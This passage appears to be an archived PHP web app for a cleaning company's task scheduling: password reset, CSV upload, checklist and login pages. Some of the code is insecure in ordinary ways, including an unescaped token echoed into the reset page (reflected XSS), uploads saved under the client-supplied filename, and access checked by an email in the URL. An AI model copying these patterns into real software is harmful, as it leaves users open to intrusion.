margin-top: 20px; } </style> </head> <body> <div class="auth-wrapper"> <div class="container-fluid h-100"> <div class="row flex-row h-100 bg-white"> <div class="col-xl-4 col-lg-6 col-md-7 my-auto p-0 mx-auto"> <div class="authentication-form mx-auto"> <a href="login.php"><img src="../src/img/Emera-Primary-Logo.png" alt="Emera Logo" style="height: 100px; align-items: center; display: block; margin-left: auto; margin-right: auto;"></a> <br> <p class="text-center">Enter your new password</p> <form method="post" name="reset-password" id="reset-password"> <div class="form-group"> <input type="password" class="form-control" name="new-password" placeholder="New Password" required> </div> <div class="form-group"> <input type="password" class="form-control" name="confirm-password" placeholder="Confirm Password" required> </div> <input type="hidden" name="token" value="<?php echo $_GET['token']; ?>"> <div class="sign-btn text-center"> <button class="btn btn-theme" type="submit">Reset Password</button> </div> <div id="reset-password-error" class="alert alert-danger d-none mt-3"></div> <div id="reset-password-success" class="alert alert-success d-none mt-3"></div> </form> <div class="register"> <p>Remembered? <a href="../login.php">Sign In</a></p> </div> </div> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> $(document).ready(function(){ $("#reset-password").submit(function(e){ e.preventDefault(); var newPassword = $("input[name='new-password']").val(); var confirmPassword = $("input[name='confirm-password']").val(); var token = $("input[name='token']").val(); if (newPassword !== confirmPassword) { $("#reset-password-error").text("Passwords do not match").removeClass("d-none"); return; } $.ajax({ url: 'update_password.php', type: 'POST', data: {token: token, new_password: newPassword}, success: function(response){ if (response.includes("Password updated")) { Swal.fire({ title: 'Password Reset Successful!', text: response, icon: 'success', confirmButtonText: 'OK' }).then(() => { window.location.href = "login.php"; }); } else { $("#reset-password-error").text(response).removeClass("d-none"); } }, error: function(){ $("#reset-password-error").text("An error occurred. Please try again.").removeClass("d-none"); } }); }); }); </script> </body> </html> process_upload.php000064400000020542151676701240010313 0ustar00<?php // process_upload.php session_start(); error_reporting(E_ALL); ini_set('display_errors', 1); // Include necessary files and classes require_once '../Classes/Database.php'; require_once '../Classes/Schedules.php'; require_once '../Classes/Task.php'; require_once '../Service/ScheduleService.php'; require_once '../Service/TaskService.php'; require_once '../Service/ServiceService.php'; $serviceService = new ServiceService(); // Check if file is uploaded and process it if ($_FILES && isset($_FILES['csv_file'])) { $fileTmpPath = $_FILES['csv_file']['tmp_name']; $fileName = $_FILES['csv_file']['name']; $fileSize = $_FILES['csv_file']['size']; $fileType = $_FILES['csv_file']['type']; // Check if the uploaded file is a CSV file $fileExtension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION)); if ($fileExtension !== 'csv') { echo json_encode(array('error' => 'Invalid file format. Please upload a CSV file.')); exit; } // Move uploaded file to a directory (you may need to adjust the destination directory) $uploadDir = '../uploads/'; $uploadPath = $uploadDir . $fileName; if (!move_uploaded_file($fileTmpPath, $uploadPath)) { $errorCode = $_FILES['file']['error']; $errorMessage = error_get_last(); echo json_encode(array('error' => 'Failed to move uploaded file. Error code: ' . $errorCode . '. ' . $errorMessage)); exit; } // CSV file path $csvFile = $uploadPath; // Schedule Name is file name and year is current year $scheduleName = pathinfo($csvFile, PATHINFO_FILENAME); //get current user id form the post request $currentUserId = $_POST['current_user_id']; // Initialize an array to store tasks $tasks = []; // Open the CSV file for reading if (($handle = fopen($csvFile, "r")) !== FALSE) { // Read headers from the first row (assuming the first row is headers) $headers = fgetcsv($handle, 1000, ","); if ($headers === false) { echo json_encode(array('error' => 'Failed to read headers from the CSV file.')); exit; } // Iterate through each row of data while (($data = fgetcsv($handle, 1000, ",")) !== FALSE) { // Initialize task array $task = [ 'service' => $data[0], // First column as service ID 'region' => $data[1], // Second column as region 'frequency' => !empty($data[2]) ? $data[2] : '3x/week', // Third column as frequency or default to '3x/week' 'dates' => [] ]; // Iterate over date headers and add non-empty dates to the 'dates' array for ($i = 3; $i < count($headers); $i++) { // Adjust date format if needed $date = DateTime::createFromFormat('m/d/Y', $headers[$i]); if ($date !== false) { $formattedDate = $date->format('Y-m-d'); // Format date as YYYY-MM-DD $time = isset($data[$i]) ? $data[$i] : ''; // Get time value or empty string if not set // Replace 'x' with empty string for time if needed if (!empty($time)) { if ($time === 'x') { $time = null; // Convert 'x' to empty string } $task['dates'][] = [ 'date' => $formattedDate, 'time' => $time ]; } } else { echo json_encode(array('error' => 'Failed to parse date: ' . $headers[$i])); exit; } } // Add the task to the tasks array only if there are dates with times if (!empty($task['dates'])) { $tasks[] = $task; } } // Construct final JSON structure $jsonOutput = [ 'scheduleName' => $scheduleName, 'currentUserId' => $currentUserId, 'tasks' => $tasks ]; // Convert JSON to string $jsonData = json_encode($jsonOutput); // Proceed with database insertion using $jsonData $data = json_decode($jsonData, true); // Decode JSON string to associative array // Extract schedule name and tasks $scheduleName = isset($data['scheduleName']) ? trim($data['scheduleName']) : ''; $currentUserId = isset($data['currentUserId']) ? trim($data['currentUserId']) : ''; $tasks = isset($data['tasks']) ? $data['tasks'] : []; $now = date('Y-m-d H:i:s'); try { // Create a new schedule $schedule = new Schedules('', $scheduleName, $currentUserId, false, $now, $now); $scheduleService = new ScheduleService(); $schedule_id = $scheduleService->addScheduleRetuenlastinsertedid($schedule); // Check if schedule creation was successful if (!$schedule_id) { echo json_encode(array('error' => 'Failed to add schedule.')); exit; } // Loop through tasks array and add each task foreach ($tasks as $taskData) { $serviceName = isset($taskData['service']) ? trim($taskData['service']) : ''; $region = isset($taskData['region']) ? trim($taskData['region']) : ''; $frequency = isset($taskData['frequency']) ? trim($taskData['frequency']) : ''; $dates = isset($taskData['dates']) ? $taskData['dates'] : []; // Validate and format dates and times $formattedDates = []; foreach ($dates as $date) { // Ensure time is converted to empty string if 'x' is found $time = $date['time'] === 'x' ? null : $date['time']; $formattedDates[] = [ 'date' => $date['date'], 'time' => $time ]; } // Get service ID from service name and region $service = $serviceService->getServiceByNameAndRegion($serviceName, $region); // Check if service exists if (!$service) { // Service does not exist, create a new service $service = new Service("", $serviceName, $region, "", "", "", "", "", "", "Australia", "", "", "", "", $now, $now); // Attempt to add the service $service_id = $serviceService->addServicereturnlastid($service); if (!$service_id) { // Handle error if service creation fails echo "Failed to create or retrieve service."; exit; // Exit or return depending on your flow } } else { // Service already exists, use its ID $service_id = $service->id; } // Create a new task instance with the formatted dates and times $task = new Task('', $schedule_id, $service_id, $frequency, json_encode($formattedDates), $currentUserId, $currentUserId, $now, $now, false, null, false, false, false, null, null, false); $taskService = new TaskService(); $task_id = $taskService->addTask($task); // Check if task creation was successful if (!$task_id) { echo json_encode(array('error' => 'Failed to add task.')); exit; } } // If everything is successful, return a success response echo json_encode(array('success' => true, 'message' => 'Tasks added successfully.', 'schedule_id' => $schedule_id)); } catch (Exception $e) { // Handle any exceptions and return an error response echo json_encode(array('error' => $e->getMessage())); } } else { echo json_encode(array('error' => 'Failed to open the CSV file.')); } // Close the file handle fclose($handle); } else { echo json_encode(array('error' => 'No file uploaded or invalid file upload.')); } ?> submit_form.php000064400000003001151676701240007606 0ustar00<?php require_once '../Classes/Database.php'; require_once '../Classes/TaskForm.php'; require_once '../Service/TaskFormService.php'; if ($_SERVER['REQUEST_METHOD'] == 'POST') { // Collect form data $subtask = $_POST['subtask_id']; $schoolName = $_POST['schoolName']; $date = $_POST['date']; $time = $_POST['time']; $main_areas = isset($_POST['main_areas']) ? implode(', ', $_POST['main_areas']) : ''; $notes = $_POST['notes']; $clientName = $_POST['clientName']; $staffName = $_POST['staffName']; $clientSignature = $_POST['clientSignature']; $staffSignature = $_POST['staffSignature']; $latitude = $_POST['latitude']; $longitude = $_POST['longitude']; $checklist_json = isset($_POST['checklist_json']) ? $_POST['checklist_json'] : ''; $main_areas = $checklist_json; // Check if signatures are present if (empty($clientSignature) || empty($staffSignature)) { echo "Both signatures are required."; exit(); } $now = date('Y-m-d H:i:s'); // Create TaskForm instance with base64 signature data $taskForm = new TaskForm(null, $subtask, $schoolName, $date, $time, $main_areas, $notes, $clientName, $clientSignature, $staffName, $staffSignature, $now, $latitude, $longitude); $taskFormService = new TaskFormService(); if ($taskFormService->insertTaskForm($taskForm)) { echo "Task Form added successfully!"; } else { echo "Failed to add task form."; } } ?> taskform.php000064400000061020151676701240007113 0ustar00<html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Holiday Program Cleaning Checklist</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; background: url('https://localhost/CleaningChecklist/cover.jpg') no-repeat center center fixed; background-size: cover; padding: 20px; margin: 0; } .container { background-color: #fff; background: linear-gradient(to right, #e2e5e7, #ffffff); box-shadow: 0 0 30px rgba(0, 0, 0, 0.3); padding: 40px; border-radius: 20px; max-width: 800px; margin: auto; } .header { text-align: center; margin-bottom: 40px; } .header img { width: 160px; height: auto; } h1 { text-align: center; font-size: 3.5em; margin-bottom: 30px; color: #1e3c72; text-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3); background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; font-family: 'Poppins', sans-serif; } .form-group label { font-weight: bold; color: #1e3c72; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .form-control { border: 2px solid #2a5298; border-radius: 10px; font-size: 1.0em; padding: 14px; width: 100%; margin-bottom: 25px; transition: all 0.3s ease; } .form-control:focus { outline: none; border-color: #1e3c72; box-shadow: 0 0 7px rgba(30, 60, 114, 0.5); } .form-check-label { font-weight: bold; color: #1e3c72; margin-left: 10px; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .signature-pad { border: 2px dashed #2a5298; border-radius: 10px; height: 150px; background-color: #fff; box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2); margin-top: 25px; display: flex; justify-content: center; align-items: center; } .signature-pad:hover { border-color: #1e3c72; } .note { font-size: 1.2em; color: #1e3c72; margin-top: 25px; text-align: center; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .section h2 { font-size: 1.5em; color: #1e3c72; margin-bottom: 20px; text-align: left; background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3); font-family: 'Poppins', sans-serif; } .btn-primary { background: linear-gradient(to right, #2a5298, #1e3c72); color: #fff; border: none; padding: 15px 30px; border-radius: 8px; cursor: pointer; font-size: 20px; margin-top: 35px; display: block; width: 100%; transition: all 0.3s ease; } .btn-primary:hover { background: linear-gradient(to right, #1e3c72, #2a5298); } .footer { border-top: 1px solid #ccc; padding-top: 20px; margin-top: 35px; font-size: 1em; color: #555; text-align: center; } .section { margin-bottom: 20px; } .form-check { display: flex; align-items: center; margin-bottom: 5px; } .form-check-input { width: 20px; height: 20px; margin-right: 20px; /* Small space between checkbox and label */ padding: 20px; } .form-check-label { margin: 0; font-weight: normal; /* Ensure sentences are not bold */ } .footer a { color: #1e3c72; text-decoration: none; } .footer a:hover { text-decoration: underline; } </style> </head> <?php date_default_timezone_set("Australia/Sydney"); // Show error if no id is passed with the URL parameter if (!isset($_GET['task_id'])) { echo "Invalid Request"; exit(); } else { $task_id = $_GET['task_id']; require_once '../Service/TaskService.php'; require_once '../Service/SubtaskService.php'; $taskService = new TaskService(); $subtaskService = new SubtaskService(); // Get task details $task = $taskService->getTaskById($task_id); // Fetch all subtasks for the given task_id $subtasks = $subtaskService->getAllSubtasksForTask($task_id); $taskOwnerEmail = $task->assignedCleaneremail; //check if the task owner email is equil form the email from the url if($taskOwnerEmail != $_GET['email']){ echo "Unauthorized Access"; exit(); } // Check if subtasks are empty if (empty($subtasks)) { echo "No subtasks found for this task"; exit(); } // Check if TODAY exists in subtask dates and get the corresponding subtask $today_date = date('Y-m-d'); $today_subtask = null; foreach ($subtasks as $subtask) { if ($subtask->subtask_date == $today_date) { $today_subtask = $subtask; break; } } // If no subtask found for today, show an appropriate message if (!$today_subtask) { echo "No subtasks scheduled for today"; exit(); } // Check if assigned cleaner email is null in task if ($task->assignedCleaneremail == null) { echo "No cleaner assigned to this task"; exit(); } // Check if subtask has already been submitted if ($today_subtask->completed == 1 && $today_subtask->completed_at != null && $today_subtask->form_submission_id != null) { echo "This subtask has already been submitted. <br> View the submitted form <a href='completedsubtaskform.php?id=$today_subtask->form_submission_id'>here</a>"; exit(); } // Display the found subtask details //echo "Subtask found for today: <br>"; //echo "Subtask ID: " . $today_subtask->id . "<br>";c //echo "Subtask Date: " . $today_subtask->subtask_date . "<br>"; // Additional details display or processing can be added here } ?> <body> <div class="container"> <div class="header"> <div class="company-name">Emera Facility Services</div> <img src="../src/img/Emera-Primary-Logo.png" alt="Company Logo"> </div> <h1>Holiday Program Cleaning Checklist</h1> <form id="cleaningChecklistForm" method="POST" enctype="multipart/form-data"> <div class="form-group"> <input type="text" class="form-control" id="subtask_id" name="subtask_id" value="<?php echo htmlspecialchars($subtask->id); ?>" hidden> </div> <div class="form-group"> <label for="schoolName">School Name:</label> <!-- Display school name as text instead of input --> <h3 id="schoolName"><?php echo htmlspecialchars($subtask->service_name); ?></h3> </div> <div class="form-group"> <label for="date">Date:</label> <!-- Display date as text instead of input --> <h3 id="date"><?php echo htmlspecialchars($subtask->subtask_date); ?></h3> </div> <!-- Main Area Checklist --> <div class="section"> <h2>Main Area</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main1" data-section="mainArea" value="Vacuum/Sweep hard floors and carpet areas"> <label class="form-check-label" for="main1">Vacuum/Sweep hard floors and carpet areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main2" data-section="mainArea" value="Disinfect and mop hard floor areas"> <label class="form-check-label" for="main2">Disinfect and mop hard floor areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main3" data-section="mainArea" value="Bin Emptied"> <label class="form-check-label" for="main3">Bin Emptied</label> </div> </div> <!-- Kitchen Area Checklist --> <div class="section"> <h2>Kitchen Area</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen1" data-section="kitchenArea" value="Vacuum/Sweep hard floors"> <label class="form-check-label" for="kitchen1">Vacuum/Sweep hard floors</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen2" data-section="kitchenArea" value="Disinfect and mop hard floor areas"> <label class="form-check-label" for="kitchen2">Disinfect and mop hard floor areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen3" data-section="kitchenArea" value="Clean and wipe benchtops surroundings"> <label class="form-check-label" for="kitchen3">Clean and wipe benchtops surroundings</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen4" data-section="kitchenArea" value="Bin Emptied"> <label class="form-check-label" for="kitchen4">Bin Emptied</label> </div> </div> <!-- Bathrooms and Toilets Checklist --> <div class="section"> <h2>Bathrooms and Toilets</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom1" data-section="bathroomArea" value="Clean and disinfect sinks and taps"> <label class="form-check-label" for="bathroom1">Clean and disinfect sinks and taps</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom2" data-section="bathroomArea" value="Clean and disinfect toilets"> <label class="form-check-label" for="bathroom2">Clean and disinfect toilets</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom3" data-section="bathroomArea" value="Floor sweep and mop"> <label class="form-check-label" for="bathroom3">Floor sweep and mop</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom4" data-section="bathroomArea" value="Bin Emptied"> <label class="form-check-label" for="bathroom4">Bin Emptied</label> </div> </div> <div class="form-group"> <label for="notes">Notes:</label> <textarea class="form-control" id="notes" name="notes" rows="4"></textarea> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="clientName">Client Representative Name:</label> <input type="text" class="form-control" id="clientName" name="clientName" required> </div> <div class="form-group"> <label for="clientSignature">Client Representative Signature:</label> <canvas id="clientSignature" class="signature-pad" onclick="openSignatureModal('client')"></canvas> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="staffName">Emera Staff Member Name:</label> <input type="text" class="form-control" id="staffName" name="staffName" required> </div> <div class="form-group"> <label for="staffSignature">Emera Staff Member Signature:</label> <canvas id="staffSignature" class="signature-pad" onclick="openSignatureModal('staff')"></canvas> </div> </div> </div> <input type="hidden" id="clientSignatureData" name="clientSignature"> <input type="hidden" id="staffSignatureData" name="staffSignature"> <input type="hidden" id="checklist_json" name="checklist_json"> <input type="hidden" id="latitude" name="latitude"> <input type="hidden" id="longitude" name="longitude"> <div class="note"> This document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor. </div> <div class="button"> <input type="submit" class="btn btn-primary" value="Submit"> </div> </form> <div class="footer"> <p>Emera Facility Services</p> <p><a href="www.emerafs.com.au" target="_blank">www.emerafs.com.au</a></p> <p>16 Stelvio Close, Lynbrook, VIC 3975</p> <p>10/440 Collins St, Melbourne VIC 3000</p> <p>Phone: 1300 153 114 | Email: <a href="mailto:hello@emerafs.com.au">hello@emerafs.com.au</a></p> </div> </div> <!-- Modal --> <div class="modal fade" id="signatureModal" tabindex="-1" role="dialog" aria-labelledby="signatureModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="signatureModalLabel">Add Signature</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <canvas id="modalSignaturePad" class="signature-pad"></canvas> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" id="clearSignature">Clear</button> <button type="button" class="btn btn-primary" id="saveSignature">Save</button> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/signature_pad@4.0.0/dist/signature_pad.umd.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> document.addEventListener('DOMContentLoaded', function () { var signaturePadClient = new SignaturePad(document.getElementById('clientSignature')); var signaturePadStaff = new SignaturePad(document.getElementById('staffSignature')); var modalSignaturePad = new SignaturePad(document.getElementById('modalSignaturePad')); var activeSignaturePad; function openSignatureModal(type) { $('#signatureModal').modal('show'); activeSignaturePad = type === 'client' ? signaturePadClient : signaturePadStaff; modalSignaturePad.clear(); if (!activeSignaturePad.isEmpty()) { modalSignaturePad.fromData(activeSignaturePad.toData()); } } document.getElementById('clientSignature').addEventListener('click', function () { openSignatureModal('client'); }); document.getElementById('staffSignature').addEventListener('click', function () { openSignatureModal('staff'); }); document.getElementById('clearSignature').addEventListener('click', function () { modalSignaturePad.clear(); if (activeSignaturePad) { activeSignaturePad.clear(); } }); document.getElementById('saveSignature').addEventListener('click', function () { if (!modalSignaturePad.isEmpty()) { activeSignaturePad.fromData(modalSignaturePad.toData()); } else if (activeSignaturePad) { activeSignaturePad.clear(); } $('#signatureModal').modal('hide'); }); function collectChecklistData() { const sections = ['mainArea', 'kitchenArea', 'bathroomArea']; // Add other sections if necessary const checklistData = {}; sections.forEach(section => { checklistData[section] = []; document.querySelectorAll(`input[data-section="${section}"]:checked`).forEach(item => { checklistData[section].push(item.value); }); }); return checklistData; } document.getElementById('cleaningChecklistForm').addEventListener('submit', function (e) { e.preventDefault(); if (signaturePadClient.isEmpty() || signaturePadStaff.isEmpty()) { Swal.fire({ icon: 'error', title: 'Missing Signatures', text: 'Please provide both signatures.' }); return; } // Serialize checklist data to JSON const checklistData = collectChecklistData(); document.getElementById('checklist_json').value = JSON.stringify(checklistData); // Add signatures to hidden inputs document.getElementById('clientSignatureData').value = signaturePadClient.toDataURL(); document.getElementById('staffSignatureData').value = signaturePadStaff.toDataURL(); // Get the geolocation data function getLocation() { navigator.geolocation.getCurrentPosition(function(position) { document.getElementById('latitude').value = position.coords.latitude; document.getElementById('longitude').value = position.coords.longitude; // Collect the form data var formData = new FormData(document.getElementById('cleaningChecklistForm')); //append school name, date and time to the form data formData.append('schoolName', <?php echo json_encode($subtask->service_name); ?>); formData.append('date', <?php echo json_encode($subtask->subtask_date); ?>); const subtaskTime = <?php echo json_encode($subtask->subtask_time); ?>; // Check if time is empty if (subtaskTime == null || subtaskTime.trim() === "") { // Set time to a default value, e.g., '00:00:00' formData.append('time', '00:00:00'); } else { formData.append('time', subtaskTime); } // Submit the form using fetch fetch('submit_form.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { Swal.fire({ icon: 'success', title: 'Form Submitted', text: data }).then(() => { //reload the page location.reload(); }); }) .catch(error => { Swal.fire({ icon: 'error', title: 'Submission Error', text: 'An error occurred while submitting the form. Please try again.' }); }); }, function(error) { if (error.code === error.PERMISSION_DENIED) { //submit form without geolocation set 0 to both fields document.getElementById('latitude').value = 0; document.getElementById('longitude').value = 0; // Collect the form data var formData = new FormData(document.getElementById('cleaningChecklistForm')); //append school name, date and time to the form data formData.append('schoolName', <?php echo json_encode($subtask->service_name); ?>); formData.append('date', <?php echo json_encode($subtask->subtask_date); ?>); const subtaskTime = <?php echo json_encode($subtask->subtask_time); ?>; // Check if time is empty if (subtaskTime == null || subtaskTime.trim() === "") { // Set time to a default value, e.g., '00:00:00' formData.append('time', '00:00:00'); } else { formData.append('time', subtaskTime); } // Submit the form using fetch fetch('submit_form.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { Swal.fire({ icon: 'success', title: 'Form Submitted', text: data }).then(() => { //reload the page location.reload(); }); }) .catch(error => { Swal.fire({ icon: 'error', title: 'Submission Error', text: 'An error occurred while submitting the form. Please try again.' }); }); } else { Swal.fire({ icon: 'error', title: 'Geolocation Error', text: 'Unable to retrieve your location. Please try again or enable location services in your browser settings.' }); } }); } // Initial call to get location getLocation(); }); }); </script> </body> </html> login.php000064400000015236151676701240006405 0ustar00<!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Login | Emera Facility Services</title> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="../cropped-emera-holdings-favicon-1-32x32.png" type="image/x-icon" /> <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,600,700,800" rel="stylesheet"> <link rel="stylesheet" href="../node_modules/bootstrap/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="../node_modules/@fortawesome/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="../node_modules/ionicons/dist/css/ionicons.min.css"> <link rel="stylesheet" href="../node_modules/icon-kit/dist/css/iconkit.min.css"> <link rel="stylesheet" href="../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../dist/css/theme.min.css"> <script src="../src/js/vendor/modernizr-2.8.3.min.js"></script> </head> <body> <div class="auth-wrapper"> <div class="container-fluid h-100"> <div class="row flex-row h-100 bg-white"> <div class="col-xl-4 col-lg-6 col-md-5 p-0 d-md-block d-lg-block d-sm-none d-none"> <!-- <div class="lavalite-bg" style="background-image: url(../src/img/cover.jpg)"></div>--> </div> <div class="col-xl-4 col-lg-12 col-md-7 my-auto p-0"> <div class="authentication-form mx-auto"> <div class="logo-centered"> <a href="login.php"> <img src="https://localhost/emera/img/emera.png" alt="" class="center-image"></a> </div> <div class="text-center my-4"> <img src="../src/img/Emera-Primary-Logo.png" alt="Emera Logo" class="img-fluid" style="height: 100px;"> </div> <p>Happy to see you again!</p> <form method="post" name="login" id="login"> <div class="form-group"> <input type="text" class="form-control" name="email" placeholder="Email" required> <i class="ik ik-user"></i> </div> <div class="form-group"> <input type="password" class="form-control" name="password" placeholder="Password" required> <i class="ik ik-lock"></i> </div> <div class="row"> <div class="col text-left"> <label class="custom-control custom-checkbox"> <!-- <input type="checkbox" class="custom-control-input" id="item_checkbox" name="item_checkbox" value="option1">--> <!-- <span class="custom-control-label"> Remember Me</span>--> </label> </div> <div class="col text-right"> <a href="forgot-password.html">Forgot Password?</a> </div> </div> <div class="sign-btn text-center"> <button class="btn btn-theme" type="submit">Sign In</button> </div> <div id="login-error" class="alert alert-danger d-none mt-3"></div> </form> <div class="register"> <!-- <p>Don't have an account? <a href="register.html">Create an account</a></p>--> </div> <?php if (isset($error)) { echo "<div class='alert alert-danger'>$error</div>"; } ?> </div> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script>window.jQuery || document.write('<script src="../src/js/vendor/jquery-3.3.1.min.js"><\/script>')</script> <script src="../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../dist/js/theme.js"></script> <script> $(document).ready(function(){ $("#login").submit(function(e){ e.preventDefault(); var email = $("input[name='email']").val(); var password = $("input[name='password']").val(); $.ajax({ url: 'authenticateuser.php', type: 'POST', data: {email: email, password: password}, success: function(response){ if (response.includes("Authenticated")) { Swal.fire({ title: 'Success!', text: 'You have successfully logged in', icon: 'success', confirmButtonText: 'Ok' }).then(() => { window.location.href = determineDashboard(response); }); } else { Swal.fire({ title: 'Error!', text: response, icon: 'error', confirmButtonText: 'Ok' }); } }, error: function(){ $("#login-error").text("An error occurred during login. Please try again.").removeClass("d-none"); } }); }); function determineDashboard(response) { if (response.includes("emera_admin")) { return "emeraadmin/dashboard.php"; } else if (response.includes("subcontractor")) { return "subcontractor/dashboard.php"; } else if (response.includes("task_provider")) { return "taskprovider/dashboard.php"; } else { Swal.fire({ title: 'We Couldn\'t Determine Your Role', text: 'Please contact the system administrator', icon: 'error', confirmButtonText: 'Ok' }); // Redirect to a default page or handle as needed return "index.php"; // Example redirect } } }); </script> </body> </html> authenticateuser.php000064400000001243151676701240010643 0ustar00<?php require_once '../Classes/System.php'; require_once '../Service/UserService.php'; $system = new System(); $userService = new UserService(); if ($_SERVER["REQUEST_METHOD"] == "POST") { $email = $_POST['email']; $password = $_POST['password']; $user = $userService->login($email, $password); if ($user) { session_start(); $_SESSION['user_id'] = $user->id; $_SESSION['user_email'] = $user->email; $_SESSION['user_role'] = $user->role; $_SESSION['status'] = $user->status; echo "Authenticated as " . $user->role; } else { echo "Invalid email or password"; } } ?> logout.php000064400000000177151676701240006604 0ustar00<?php //delete session variables session_start(); session_unset(); session_destroy(); header("Location: login.php"); ?> subcontractor/viewAcceptedTasks.php000064400000025213151676701240013572 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); $currentCompanyId = 2; // Replace with dynamic company ID as needed // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksByAssignedId($companyId); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Accepted Tasks</h5> <span>View details of tasks assigned to your company</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Accepted Tasks</li> </ol> </nav> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <div class="form-group row"> <div class="col-sm-3"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-3"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-sm-3"> <label for="filter_completed" class="col-form-label">Filter Completed:</label> <select class="form-control" id="filter_completed"> <option value="">All</option> <option value="Completed.">Completed.</option> <option value="Not">Not Completed</option> </select> </div> <div class="col-sm-3"> <label class="col-form-label"> </label> <div class="col-sm-3"> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> </div> <table id="super_advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created At</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.$task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <label class="badge badge-<?php echo $task->finished ? 'success' : 'yellow'; ?>"><?php echo $task->finished ? 'Completed.' : 'Not Completed'; ?></label> </td> <td> <a href="viewtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> $(document).ready(function () { // Initialize DataTable var 